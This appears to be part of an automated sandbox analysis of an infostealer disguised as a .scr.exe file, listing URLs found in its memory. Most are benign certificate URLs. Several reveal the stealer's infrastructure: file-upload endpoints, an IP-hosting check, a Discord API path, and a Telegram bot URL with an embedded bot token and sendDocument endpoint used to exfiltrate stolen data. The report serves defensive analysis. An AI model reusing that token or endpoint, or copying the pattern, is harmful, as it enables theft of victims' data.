              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingF
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingxt
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingxtsqlite3_value_text16sqlite3_val
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2058859653.0000028C8766F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2321848291.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330228467.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2127743261.0000028C87B27000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328659211.0000028C87B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C8768F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C87690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr
              Source: powershell.exe, 00000007.00000002.2265902518.0000016191CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.0000015310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.000001530196F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000002.2344600266.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2344137024.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000029.00000002.2158201728.0000015301914000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 00000007.00000002.2195052867.0000016181EA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000007.00000002.2195052867.0000016181C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.0000015300001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000007.00000002.2195052867.0000016181EA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330698605.0000028C88168000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000029.00000002.2158201728.000001530176B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000029.00000002.2158201728.0000015301914000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftILEEX~1.LNKy./
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330228467.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftISPLA~1.PNGy.
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftRUSTT~2JSOy./
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2332092681.0000028C88A42000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88298000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 00000007.00000002.2195052867.0000016181C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.0000015300001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330698605.0000028C88168000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6932251862:AAHJgssLa4FQxIPJOSZL101THMOx2PWVwSE/sendDocument
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88234000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2329477529.0000028C87C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
